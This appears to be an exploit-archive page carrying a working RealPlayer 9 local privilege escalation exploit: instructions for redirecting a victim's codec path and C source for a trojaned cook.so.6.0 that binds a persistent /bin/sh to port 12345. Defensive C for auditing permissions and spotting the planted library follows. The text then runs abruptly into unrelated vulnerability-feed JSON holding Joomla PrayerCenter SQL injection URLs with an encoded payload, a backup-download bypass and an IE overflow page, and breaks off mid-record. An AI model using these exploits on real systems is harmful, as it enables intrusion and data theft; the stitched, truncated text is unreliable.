RealPlayer 9 *nix Local Privilege Escalation Exploit
2003-09-09T00:00:00
ID: 1337DAY-ID-7314
Type: zdt
Reporter: Jon Hart
Modified: 2003-09-09T00:00:00
Description: Exploit for the Linux platform, in category local exploits
====================================================
RealPlayer 9 *nix Local Privilege Escalation Exploit
====================================================
/**
* rp9-priv-esc.c
*
* A local privilege escalation attack against the community-supported
* version of Real.com's RealPlayer, version 9.
*
* Written by:
*
* Jon Hart warchild spoofed.org
*
* By default, configuration files are stored in ~$USER/.realnetworks/,
* but all the files in there are group writeable. So long as ~$USER
* has group execute permission (which is pretty common), a malicious
* local user can edit the config files of fellow users to do his bidding.
*
* There are a number of ways to attack this, but after some poking it seems
* that modifying the path to shared libraries and writing my own malicious
* shared libraries was the easiest.
*
* (As an aside, just because the shared libraries in the directories contained
* in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get
* the symbols back: stripping drops .symtab, not the dynamic symbol table, so
* objdump can quickly tell us what the names of the 15 functions are, and we
* can stub out a bogus shared library pretty quickly.)
*
* This particular bit of code is meant to replace the shared library
* cook.so.6.0, which is contained in the Codecs directory. To execute this
* attack against a fellow local user, first edit their config file
* (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable
* point to a directory under your control, like /tmp/Codecs. Copy all of the
* existing files from the previous value of dt_codecs (which is usually something
* like ~victim/Real/Codecs/) to /tmp/Codecs. Next, compile the code below as a
* shared library and copy it to the trojaned directory:
*
*
* `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`
*
* The next time the victim fires up realplayer 9, a nice little shell
* will be listening on port 12345 for you:
*
* guest@haiti:/$ id
* uid=1006(guest) gid=100(users) groups=100(users)
* guest@haiti:/$ nc localhost 12345
* id
* uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)
*
* Of course, you don't have to execute a shell. Do whatever makes you happy.
*
* Fix? `chmod 700 ~/.realnetworks/*`
*
* Copyright (c) 2003, Jon Hart
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* * Neither the name of the organization nor the names of its contributors may
* be used to endorse or promote products derived from this software without
* specific prior written permission.
*
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*
*
*
*/
#define PORT 12345
#include <stdio.h>
#include <signal.h>
#include <strings.h>     /* bzero() */
#include <unistd.h>      /* fork(), setpgrp(), dup2(), execl(), close() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>

int cookthis(void);      /* defined below; declared here so the stubs compile cleanly */

/* Exported stubs carrying the same names as the 15 symbols of the genuine
 * cook.so.6.0, so every lookup the player makes resolves against this file. */
void RAInitEncoder(void) { }
/** This just happens to be one of the first
 * functions that realplayer calls after cook.so.6.0 is loaded
 */
void RAOpenCodec2(void) { cookthis(); }
void RAOpenCodec(void) { }
void RAGetNumberOfFlavors(void) { }
void RACloseCodec(void) { }
void RADecode(void) { }
void RAEncode(void) { }
void RAFreeEncoder(void) { }
void RAGetNumberOfFlavors2(void) { }
void RAFreeDecoder(void) { }
void RAFlush(void) { }
void RAGetFlavorProperty(void) { }
void G2(void) { }
void RASetFlavor(void) { }
void RAInitDecoder(void) { }
void RACreateEncoderInstance(void) { }

/* Bind /bin/sh to PORT. It forks
 * and all that good stuff, so it won't
 * easily go away.
 */
int cookthis(void) {
    int sock_des, sock_client, server_pid;
    socklen_t sock_len;
    struct sockaddr_in server_addr;
    struct sockaddr_in client_addr;

    if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
        exit(EXIT_FAILURE);
    bzero((char *) &server_addr, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    server_addr.sin_port = htons(PORT);
    if (bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr)) != 0)
        exit(EXIT_FAILURE);
    /* Double fork: the player process itself exits, and the listener is left
     * detached in its own process group, ignoring SIGHUP. */
    if (fork() != 0)
        exit(EXIT_SUCCESS);
    setpgrp();
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(EXIT_SUCCESS);
    if (listen(sock_des, 5) != 0)
        exit(EXIT_SUCCESS);
    while (1) {
        sock_len = sizeof(client_addr);
        if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)
            exit(EXIT_SUCCESS);
        server_pid = fork();
        if (server_pid != 0) {
            /* Parent hands the connection to a shell whose argv[0] reads
             * "realplay"; the child goes back to accept(). */
            dup2(sock_client, 0);
            dup2(sock_client, 1);
            dup2(sock_client, 2);
            execl("/bin/sh", "realplay", (char *)0);
            close(sock_client);
            exit(EXIT_SUCCESS);
        }
        close(sock_client);
    }
}
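The root cause above is a configuration directory whose contents are writable by the whole group, which lets another user redirect dt_codecs and have the player dlopen() a library from a directory they own; the advisory's fix is chmod 700. The following is an added example, our own code rather than Jon Hart's or RealPlayer's, showing in C the ownership and mode check a plugin loader should apply before loading anything from a user-configurable directory, the same check used to audit a config directory, and the advisory's remedy applied programmatically. It is exercised on a constructed fixture under /tmp that mirrors the advisory's permissions. All function names (path_is_private, codec_library_loadable, audit_config_dir, demo_scenario, demo_codec_verdict), the reason codes and the fixture path are our assumptions.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Reason codes returned by the checks below (names are ours). */
enum { PATH_OK = 0, PATH_MISSING, PATH_SYMLINK, PATH_WRONG_OWNER, PATH_SHARED_WRITE };

/* A path is "private" when it is a plain file or directory owned by 'owner' (root is
 * also accepted) and writable by nobody else. lstat() rejects a planted symlink. */
int path_is_private(const char *path, uid_t owner) {
    struct stat st;
    if (lstat(path, &st) != 0) return PATH_MISSING;
    if (S_ISLNK(st.st_mode)) return PATH_SYMLINK;
    if (st.st_uid != owner && st.st_uid != 0) return PATH_WRONG_OWNER;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return PATH_SHARED_WRITE;
    return PATH_OK;
}

/* The question a codec loader should ask before dlopen()ing dir/soname. In the
 * advisory's scenario /tmp/Codecs belongs to another uid, so this refuses. */
int codec_library_loadable(const char *dir, const char *soname) {
    char full[PATH_MAX];
    int rc = path_is_private(dir, getuid());
    if (rc != PATH_OK) return rc;
    snprintf(full, sizeof full, "%s/%s", dir, soname);
    return path_is_private(full, getuid());
}

/* Audit a config directory such as ~/.realnetworks: count the directory and every
 * entry that is not private; with fix != 0 apply the advisory's chmod 700 to each. */
int audit_config_dir(const char *dir, int fix) {
    char full[PATH_MAX];
    struct dirent *e;
    DIR *d;
    int bad = 0;
    if (path_is_private(dir, getuid()) != PATH_OK) {
        bad++;
        if (fix) chmod(dir, 0700);
    }
    if ((d = opendir(dir)) == NULL) return bad;
    while ((e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0) continue;
        snprintf(full, sizeof full, "%s/%s", dir, e->d_name);
        if (path_is_private(full, getuid()) != PATH_OK) {
            bad++;
            if (fix) chmod(full, 0700);
        }
    }
    closedir(d);
    return bad;
}

/* Constructed fixture mirroring the advisory: a group-writable config directory
 * holding a group-writable cook.so.6.0 (an empty placeholder, not a library). */
static int build_fixture(char *dir, size_t len) {
    char tmpl[] = "/tmp/rp9-audit-XXXXXX", so[PATH_MAX];
    int fd;
    if (mkdtemp(tmpl) == NULL) return -1;
    snprintf(dir, len, "%s", tmpl);
    if (chmod(dir, 0770) != 0) return -1;
    snprintf(so, sizeof so, "%s/cook.so.6.0", dir);
    if ((fd = open(so, O_WRONLY | O_CREAT | O_TRUNC, 0664)) < 0) return -1;
    if (fchmod(fd, 0664) != 0) { close(fd); return -1; }   /* override umask */
    close(fd);
    return 0;
}

static void destroy_fixture(const char *dir) {
    char so[PATH_MAX];
    snprintf(so, sizeof so, "%s/cook.so.6.0", dir);
    unlink(so);
    rmdir(dir);
}

/* Findings on the fixture: 2 (directory + file) before the fix, 0 once fixed. */
int demo_scenario(int fix) {
    char dir[64]; int findings;
    if (build_fixture(dir, sizeof dir) != 0) return -1;
    findings = audit_config_dir(dir, fix);
    if (fix) findings = audit_config_dir(dir, 0);   /* re-audit after locking down */
    destroy_fixture(dir);
    return findings;
}

/* Loader verdict on the fixture: PATH_SHARED_WRITE before, PATH_OK after the fix. */
int demo_codec_verdict(int fix) {
    char dir[64]; int verdict;
    if (build_fixture(dir, sizeof dir) != 0) return -1;
    if (fix) audit_config_dir(dir, 1);
    verdict = codec_library_loadable(dir, "cook.so.6.0");
    destroy_fixture(dir);
    return verdict;
}
```

The ownership test is what defeats the advisory's /tmp/Codecs redirection even when the mode bits look fine: a directory created by another user fails PATH_WRONG_OWNER regardless of its permissions. A production loader would additionally walk every parent directory up to / in the same way, which is why a world-writable location such as /tmp can never pass.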
# 0day.today [2018-01-04] #
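The post-exploitation state the advisory describes is a codec library mapped into the player from /tmp/Codecs instead of ~/Real/Codecs. As an added detection example that is not part of the advisory, the following C parses text in the /proc/<pid>/maps format and counts executable, file-backed mappings whose file lies outside a trusted set of library directories; in a deployment the text would be read from the maps file of the running player process. The sample maps lines are constructed, and the allow-list and the names count_untrusted_mappings and path_is_trusted_library are ours.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample in /proc/<pid>/maps format: libc from /lib, a genuine codec
 * from ~/Real/Codecs, and the advisory's planted copy of cook.so.6.0 in /tmp. */
const char SAMPLE_MAPS[] =
    "7f3a2c000000-7f3a2c1b0000 r-xp 00000000 08:01 131342 /lib/x86_64-linux-gnu/libc-2.31.so\n"
    "7f3a2c1b0000-7f3a2c3b0000 ---p 001b0000 08:01 131342 /lib/x86_64-linux-gnu/libc-2.31.so\n"
    "7f3a2c3c0000-7f3a2c3d0000 r-xp 00000000 08:01 524391 /home/guest/Real/Codecs/sipr.so.6.0\n"
    "7f3a2c5e0000-7f3a2c5f0000 r-xp 00000000 08:01 918274 /tmp/Codecs/cook.so.6.0\n"
    "7f3a2c5f0000-7f3a2c5f1000 rw-p 00010000 08:01 918274 /tmp/Codecs/cook.so.6.0\n"
    "7ffd1e000000-7ffd1e021000 rw-p 00000000 00:00 0 [stack]\n";

/* System directories from which mapped code is expected (our assumption). */
static const char *TRUSTED_PREFIXES[] = { "/lib", "/lib64", "/usr/lib", "/usr/local/lib", NULL };

/* True when 'path' is 'prefix' itself or lies below it (so /libfoo does not match /lib). */
static int under(const char *path, const char *prefix) {
    size_t n = strlen(prefix);
    return strncmp(path, prefix, n) == 0 && (path[n] == '/' || path[n] == '\0');
}

/* Trusted: the system prefixes above, or the user's own ~/Real tree. */
int path_is_trusted_library(const char *path, const char *home) {
    char real_dir[512];
    int i;
    snprintf(real_dir, sizeof real_dir, "%s/Real", home);
    if (under(path, real_dir)) return 1;
    for (i = 0; TRUSTED_PREFIXES[i] != NULL; i++)
        if (under(path, TRUSTED_PREFIXES[i])) return 1;
    return 0;
}

/* Walk maps text line by line and count executable, file-backed mappings whose
 * file sits outside the trusted directories. A library normally has exactly one
 * r-x segment, so each hijacked library is counted once. */
int count_untrusted_mappings(const char *maps, const char *home) {
    int count = 0;
    const char *line = maps;
    while (*line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[1024], range[64], perms[8], dev[16], path[512];
        unsigned long off, inode;
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (sscanf(buf, "%63s %7s %lx %15s %lu %511s", range, perms, &off, dev, &inode, path) == 6
            && strchr(perms, 'x') != NULL && path[0] == '/'
            && !path_is_trusted_library(path, home))
            count++;
        line = nl ? nl + 1 : line + len;
    }
    return count;
}

int main(void) {
    printf("untrusted executable mappings: %d\n",
           count_untrusted_mappings(SAMPLE_MAPS, "/home/guest"));   /* 1: /tmp/Codecs/cook.so.6.0 */
    return 0;
}
```

Mappings without a leading slash ([stack], [vdso]) and non-executable segments are ignored, so the sample yields exactly one finding. Pair this with the process name check the advisory implies: the spawned shell sets argv[0] to "realplay" while its executable is /bin/sh, so comparing /proc/<pid>/exe against the command line catches the listener itself.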
Source: https://0day.today/exploit/7314
\n#################################################################### \n \n# Description about Software : \n*************************** \nPrayerCenter 3.0.4 and 3.0.2 is now available for Joomla 3.x. \n \nThe PrayerCenter Component provides users of a website with the capability to \n \nshare their prayer concerns with others. Prayer concerns can be posted to the website, sent to \n \nmembers of the prayer chain, and sent to the Spiritual director or pastor. \n \nUsers can subscribe to be members of the prayer chain via online form. \n \n#################################################################### \n \n# Impact : \n*********** \n* Joomla PrayerCenter 3.0.4 and other versions - \n \ncomponent for Joomla is prone to an SQL-injection vulnerability because it \n \nfails to sufficiently sanitize user-supplied data before using it in an SQL query. \n \nExploiting this issue could allow an attacker to compromise the application, \n \naccess or modify data, or exploit latent vulnerabilities in the underlying database. \n \nA remote attacker can send a specially crafted request to the vulnerable application \n \nand execute arbitrary SQL commands in application`s database. \n \nFurther exploitation of this vulnerability may result in unauthorized data manipulation. \n \nAn attacker can exploit this issue using a browser. \n \n* This Software prone to an information exposure/database disclosure vulnerability. \n \nSuccessful exploits of this issue may allow an attacker to obtain sensitive \n \ninformation by downloading the full contents of the application's database. \n \n* Any remote user may download the database files and gain access \n \nto sensitive information including unencrypted authentication credentials. 
\n \n#################################################################### \n \n# SQL Injection Exploit : \n********************** \n/index.php?option=com_prayercenter&Itemid=[SQL Injection] \n \n/index.php?Itemid=[SQL Injection]&option=com_prayercenter \n \n/index.php?option=com_prayercenter&task=view&Itemid=[SQL Injection] \n \n/index.php?option=com_prayercenter&task=view_devotion&Itemid=[SQL Injection] \n \n/index.php?option=com_prayercenter&task=view&Itemid=[ID-NUMBER]&limitstart=[SQL Injection] \n \n/index.php?option=com_prayercenter&task=confirm&id=[ID-NUMBER]&sessionid=[SQL Injection] \n \n# Database Disclosure Exploit : \n******************************* \n/admin/sql/install.mysql.utf8.sql \n \n/admin/sql/uninstall.mysql.utf8.sql \n \n/administrator/components/com_prayercenter/install.mysql.utf8.sql \n \n/administrator/components/com_prayercenter/uninstall.mysql.utf8.sql \n \n#################################################################### \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n#################################################################### \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/151671/joomlaprayercenter304-sqldisclose.txt"}, {"lastseen": "2018-02-24T00:58:02", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-23T00:00:00", "published": "2018-02-23T00:00:00", "href": "https://packetstormsecurity.com/files/146547/Joomla-PrayerCenter-3.0.2-SQL-Injection.html", "id": "PACKETSTORM:146547", "type": "packetstorm", "title": "Joomla! PrayerCenter 3.0.2 SQL Injection", "sourceData": "`# # # # \n# Exploit Title: Joomla! 
Component PrayerCenter 3.0.2 - SQL Injection \n# Dork: N/A \n# Date: 22.02.2018 \n# Vendor Homepage: http://www.mlwebtechnologies.com/ \n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/ \n# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/ \n# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip \n# Version: 3.0.2 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-7314 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL] \n# \n# # # # \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146547/joomlaprayercenter302-sql.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "joomla": [{"lastseen": "2018-09-18T08:40:47", "bulletinFamily": "software", "description": "PrayerCenter by Mike Leeper (MLWebTechnologies), versions 3.0.2 and previous,SQL Injection\n\nresolution: update to 3.0.3\n\nupdate notice: https://github.com/MLWebTechnologies/PrayerCenter\n", "modified": "2018-03-30T13:11:19", "published": "2018-03-06T00:00:00", "id": "JVEL:591", "href": "https://vel.joomla.org/vel-blog/2117", "type": "joomla", "title": "PrayerCenter,3.0.2,SQL Injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-05-29T18:20:29", "bulletinFamily": "NVD", "description": "SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! 
via the sessionid parameter, a different vulnerability than CVE-2008-6429.", "modified": "2018-03-06T13:58:00", "id": "CVE-2018-7314", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7314", "published": "2018-02-22T19:29:00", "title": "CVE-2018-7314", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-02-22T21:20:29", "bulletinFamily": "exploit", "description": "Joomla! Component PrayerCenter 3.0.2 - 'sessionid' SQL Injection. CVE-2018-7314. Webapps exploit for PHP platform", "modified": "2018-02-22T00:00:00", "published": "2018-02-22T00:00:00", "id": "EDB-ID:44160", "href": "https://www.exploit-db.com/exploits/44160/", "type": "exploitdb", "title": "Joomla! Component PrayerCenter 3.0.2 - 'sessionid' SQL Injection", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component PrayerCenter 3.0.2 - SQL Injection\r\n# Dork: N/A\r\n# Date: 22.02.2018\r\n# Vendor Homepage: http://www.mlwebtechnologies.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/\r\n# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/\r\n# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip\r\n# Version: 3.0.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7314\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL]\r\n# \r\n# 
%31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69\r\n# \r\n# # # #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44160/"}], "zdt": [{"lastseen": "2018-04-08T05:43:31", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-02-22T00:00:00", "published": "2018-02-22T00:00:00", "href": "https://0day.today/exploit/description/29866", "id": "1337DAY-ID-29866", "title": "Joomla PrayerCenter 3.0.2 Component - sessionid SQL Injection Vulnerability", "type": "zdt", "sourceData": "# # # #\r\n# Exploit Title: Joomla! 
Component PrayerCenter 3.0.2 - SQL Injection\r\n# Vendor Homepage: http://www.mlwebtechnologies.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/prayercenter/\r\n# Software Download: http://mlwebtechnologies.github.io/PrayerCenter/\r\n# Software Download: https://github.com/MLWebTechnologies/PrayerCenter/releases/download/3.0.2/PrayerCenter302Unzip1st.zip\r\n# Version: 3.0.2\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7314\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=[SQL]\r\n# \r\n# %31%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%56%65%72%41%79%61%72%69\r\n# \r\n# # # #\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29866"}, {"lastseen": "2018-04-03T15:27:30", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-07-20T00:00:00", "published": "2010-07-20T00:00:00", "id": "1337DAY-ID-13411", "href": "https://0day.today/exploit/description/13411", "type": "zdt", "title": "EZ-Oscommerce 3.1 by Pass / Creat and Download Backup Vulnerability", "sourceData": "===================================================================\r\nEZ-Oscommerce 3.1 by Pass / Creat and 
Download Backup Vulnerability\r\n===================================================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ####################################### 1\r\n0 I'm indoushka member from Inj3ct0r Team 1\r\n1 ####################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n######################################################################## \r\n\r\n# Vendor: http://www.ezosc.com\r\n\r\n# Date: 2010-05-27 \r\n\r\n# Author : indoushka \r\n\r\n# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
\r\n\r\n# Contact : [email\u00a0protected] \r\n\r\n# Home : www.arab-blackhat.co.cc\r\n\r\n# Dork :Powered by osCommerce | Customized by EZ-Oscommerce\r\n\r\n# Bug : Backup Vulnerability \r\n\r\n# Tested on : windows SP2 Français V.(Pnx2 2.0) \r\n######################################################################## \r\n \r\n# Exploit By indoushka \r\n\r\n\r\nhttp://127.0.0.1/ezosc/admin/backup/login.php?action=backupnow\r\n\r\nhttp://127.0.0.1/ezosc/admin/backup/login.php?action=backup\r\n\r\nto download backup : http://127.0.0.1/ezosc/admin/backup/login.php?action=download&file=db_comm-20100301222138.sql\r\n\r\ndb_comm-20100301222138.sql change it to the name of the backup and you can't download it with IE i download it with opera 10.10 + Mozilla Firefox\r\n\r\nDz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================\r\nall my friend :\r\nHis0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N\r\n(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH\r\n---------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13411"}, {"lastseen": "2018-02-15T19:13:27", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "id": "1337DAY-ID-6429", "href": "https://0day.today/exploit/description/6429", "type": "zdt", "title": "MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit", "sourceData": "================================================================\r\nMS Internet Explorer 6 DirectX Media Remote Overflow DoS 
Exploit\r\n================================================================\r\n\r\n\r\n\r\n\r\n<!--============================================================================\r\ndxtmsft.dll Remote Buffer Overflow Exploit\r\nInternet Explorer ver 6.0\r\nDeltahackingSecurityTEAM\r\nBug discovered by Dr.Pantagon\r\nAffected Software: dxtmsft.dll (DirectX Media -- Image DirectX Transforms)\r\nDLL VER : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)\r\nCompany Dll : Microsoft® Windows® Operating System\r\npath : C:\\WINDOWS\\system32\\dxtmsft.dll\r\nall software that use this ocx are vulnerable to this exploits.\r\nwww.Deltahacking.net\r\nwww.Deltasecurity.ir\r\n==============================================================================-->\r\n\r\n<object classid=\"clsid:421516C1-3CF8-11D2-952A-00C04FA34F05\" id=\"Chroma\"></object>\r\n\r\n<input language=VBScript onclick=jojo() type=button value=\"Click here to start Exploit\"><script language='vbscript'>\r\n Sub jojo\r\n buff = String(999999, \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA\")\r\n\r\n get_EDX = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee\"\r\n\r\n buff1 = String(999999, \"BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb\")\r\n\r\n egg = buff + get_EDX + buff1 + scode\r\n\r\n Chroma.Color = egg\r\n End Sub\r\n</script>\r\n\r\n\r\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6429"}], "openvas": [{"lastseen": "2017-07-25T10:55:19", "bulletinFamily": "scanner", "description": "Check for the Version of systemtap", "modified": "2017-07-10T00:00:00", "published": "2011-06-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863106", "id": "OPENVAS:863106", "title": "Fedora Update for systemtap FEDORA-2011-7289", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for systemtap 
